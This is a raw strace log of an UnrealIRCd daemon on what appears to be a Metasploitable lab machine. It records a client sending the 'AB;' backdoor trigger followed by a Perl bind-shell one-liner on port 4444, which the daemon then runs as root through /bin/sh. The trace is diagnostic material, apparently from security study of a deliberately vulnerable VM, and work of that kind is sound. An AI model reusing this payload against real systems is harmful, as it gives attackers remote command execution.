4519  07:21:12.598369 select(1024, [2 3 4 7 9], [], NULL, {0, 610000}) = 1 (in [2], left {0, 420000})

4519  07:21:12.786518 clock_gettime(CLOCK_MONOTONIC, {1682, 603554474}) = 0

4519  07:21:12.786588 time(NULL)        = 1495624872

4519  07:21:12.786645 time(NULL)        = 1495624872

4519  07:21:12.786669 gettimeofday({1495624872, 786691}, NULL) = 0

4519  07:21:12.786700 select(1024, [2], [], NULL, {0, 0}) = 1 (in [2], left {0, 0})

4519  07:21:12.786740 clock_gettime(CLOCK_MONOTONIC, {1682, 603753702}) = 0

4519  07:21:12.786751 gettimeofday({1495624872, 786755}, NULL) = 0

4519  07:21:12.786762 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {1, 0})

4519  07:21:12.786801 clock_gettime(CLOCK_MONOTONIC, {1682, 603814195}) = 0

4519  07:21:12.786813 accept(2, 0, NULL) = 5

4519  07:21:12.786833 getpeername(5, {sa_family=AF_INET, sin_port=htons(42361), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:21:12.786865 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:21:12.786878 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:21:12.786891 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:21:12.786903 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:21:12.786915 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:21:12.786976 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:21:12.786992 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:21:12.787008 clock_gettime(CLOCK_MONOTONIC, {1682, 604021838}) = 0

4519  07:21:12.787020 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:21:12.787032 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:21:12.787042 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:21:12.787052 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:21:12.787062 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:21:12.787078 send(6, "\232R\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:21:12.787208 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:21:12.787230 gettimeofday({1495624872, 787234}, NULL) = 0

4519  07:21:12.787241 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {1, 0})

4519  07:21:12.791919 clock_gettime(CLOCK_MONOTONIC, {1682, 608936211}) = 0

4519  07:21:12.791936 recvfrom(6, "\232R\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0_\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:21:12.791976 close(6)          = 0

4519  07:21:12.791990 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:21:12.792005 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174

4519  07:21:12.792060 time(NULL)        = 1495624872

4519  07:21:12.792072 time(NULL)        = 1495624872

4519  07:21:12.792084 gettimeofday({1495624872, 792087}, NULL) = 0

4519  07:21:12.792095 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:21:12.792124 clock_gettime(CLOCK_MONOTONIC, {1682, 609137326}) = 0

4519  07:21:12.792135 gettimeofday({1495624872, 792139}, NULL) = 0

4519  07:21:12.792145 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [4], left {0, 850000})

4519  07:21:12.935132 clock_gettime(CLOCK_MONOTONIC, {1682, 752153057}) = 0

4519  07:21:12.935154 recv(4, "PRIVMSG  #testit ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ\n", 8192, 0) = 70

4519  07:21:12.935180 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:12.935200 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:12.935215 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:12.935229 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:12.935243 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:12.935265 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:12.935279 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:12.935292 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:12.935306 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:12.935319 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:12.935333 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:12.935347 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:12.935360 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:12.935374 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:12.935387 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:12.935400 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:12.935414 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:12.935427 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:12.935441 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:12.935455 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:12.935469 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:12.935482 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 260000}, ...}) = 0

4519  07:21:12.935499 gettimeofday({1495624872, 935503}, NULL) = 0

4519  07:21:12.935511 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:21:12.935563 clock_gettime(CLOCK_MONOTONIC, {1682, 752576264}) = 0

4519  07:21:12.935575 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:21:12.935604 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:21:12.935624 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:21:12.935636 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:21:12.935651 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 7963

7963  07:21:12.935717 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

7963  07:21:12.935732 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

7963  07:21:12.935743 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7963  07:21:12.935756 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

7963  07:21:12.935863 brk(0)            = 0x80f9000

7963  07:21:12.935885 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7963  07:21:12.935905 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f1b000

7963  07:21:12.935922 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

7963  07:21:12.935940 open("/etc/ld.so.cache", O_RDONLY) = 1

7963  07:21:12.935953 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7963  07:21:12.935972 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f13000

7963  07:21:12.935983 close(1)          = 0

7963  07:21:12.935994 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7963  07:21:12.936010 open("/lib/libncurses.so.5", O_RDONLY) = 1

7963  07:21:12.936023 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

7963  07:21:12.936173 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

7963  07:21:12.936192 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ee3000

7963  07:21:12.936205 mmap2(0xb7f10000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7f10000

7963  07:21:12.936222 close(1)          = 0

7963  07:21:12.936234 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7963  07:21:12.936248 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

7963  07:21:12.936262 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

7963  07:21:12.936353 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

7963  07:21:12.936370 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7edf000

7963  07:21:12.936381 mmap2(0xb7ee1000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7ee1000

7963  07:21:12.936397 close(1)          = 0

7963  07:21:12.936409 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7963  07:21:12.936422 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

7963  07:21:12.936436 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

7963  07:21:12.936535 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

7963  07:21:12.936554 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ede000

7963  07:21:12.936595 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d8f000

7963  07:21:12.936623 mmap2(0xb7ed8000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7ed8000

7963  07:21:12.936638 mmap2(0xb7edb000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7edb000

7963  07:21:12.936652 close(1)          = 0

7963  07:21:12.936675 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d8e000

7963  07:21:12.936686 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d8e6b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

7963  07:21:12.936749 mprotect(0xb7ed8000, 4096, PROT_READ) = 0

7963  07:21:12.936785 munmap(0xb7f13000, 29913) = 0

7963  07:21:12.936811 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7963  07:21:12.936825 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

7963  07:21:12.936844 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbf9ed3b0) = -1 ENOTTY (Inappropriate ioctl for device)

7963  07:21:12.936875 brk(0)            = 0x80f9000

7963  07:21:12.936884 brk(0x80fa000)    = 0x80fa000

7963  07:21:12.936896 brk(0x80fb000)    = 0x80fb000

7963  07:21:12.936913 getuid32()        = 0

7963  07:21:12.936922 getgid32()        = 0

7963  07:21:12.936931 geteuid32()       = 0

7963  07:21:12.936940 getegid32()       = 0

7963  07:21:12.936953 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7963  07:21:12.936967 time(NULL)        = 1495624872

7963  07:21:12.936980 brk(0x80fc000)    = 0x80fc000

7963  07:21:12.936994 brk(0x80fd000)    = 0x80fd000

7963  07:21:12.937013 open("/proc/meminfo", O_RDONLY) = 1

7963  07:21:12.937088 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

7963  07:21:12.937109 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f1a000

7963  07:21:12.937121 read(1, "MemTotal:      1035240 kB\nMemFree:        534680 kB\nBuffers:         65120 kB\nCached:         278404 kB\nSwapCached:          0 kB\nActive:         254532 kB\nInactive:       217956 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        534440 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            3844 kB\nWriteback:           0 kB\nAnonPages:      128980 kB\nMapped:          52004 kB\nSlab:            16976 kB\nSReclaimable:     8724 kB\nSUnreclaim:       8252 kB\nPageTables:       1952 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

7963  07:21:12.937223 close(1)          = 0

7963  07:21:12.937235 munmap(0xb7f1a000, 4096) = 0

7963  07:21:12.937247 brk(0x80fe000)    = 0x80fe000

7963  07:21:12.937274 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

7963  07:21:12.937287 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

7963  07:21:12.937299 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7963  07:21:12.937311 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7963  07:21:12.937323 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

7963  07:21:12.937335 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

7963  07:21:12.937349 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7963  07:21:12.937360 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

7963  07:21:12.937378 uname({sys="Linux", node="metasploitable", ...}) = 0

7963  07:21:12.937426 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

7963  07:21:12.937444 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7963  07:21:12.937462 brk(0x8100000)    = 0x8100000

7963  07:21:12.937474 getcwd("/etc/unreal", 4096) = 12

7963  07:21:12.937488 getpid()          = 7963

7963  07:21:12.937514 getppid()         = 4519

7963  07:21:12.937530 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7963  07:21:12.937550 stat64("/sbin/sh", 0xbf9ed388) = -1 ENOENT (No such file or directory)

7963  07:21:12.937563 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

7963  07:21:12.937581 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

7963  07:21:12.937605 socket(PF_FILE, SOCK_STREAM, 0) = 1

7963  07:21:12.937619 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

7963  07:21:12.937631 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

7963  07:21:12.937653 close(1)          = 0

7963  07:21:12.937665 socket(PF_FILE, SOCK_STREAM, 0) = 1

7963  07:21:12.937675 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

7963  07:21:12.937686 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

7963  07:21:12.937704 close(1)          = 0

7963  07:21:12.937717 open("/etc/nsswitch.conf", O_RDONLY) = 1

7963  07:21:12.937731 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

7963  07:21:12.937748 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f1a000

7963  07:21:12.937760 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

7963  07:21:12.937809 read(1, "", 4096) = 0

7963  07:21:12.937819 close(1)          = 0

7963  07:21:12.937829 munmap(0xb7f1a000, 4096) = 0

7963  07:21:12.937845 open("/etc/ld.so.cache", O_RDONLY) = 1

7963  07:21:12.937858 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7963  07:21:12.937874 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f13000

7963  07:21:12.937884 close(1)          = 0

7963  07:21:12.937895 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7963  07:21:12.937910 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

7963  07:21:12.937925 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

7963  07:21:12.938015 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

7963  07:21:12.938041 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d85000

7963  07:21:12.938054 mmap2(0xb7d8c000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7d8c000

7963  07:21:12.938075 close(1)          = 0

7963  07:21:12.938087 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7963  07:21:12.938100 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

7963  07:21:12.938114 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

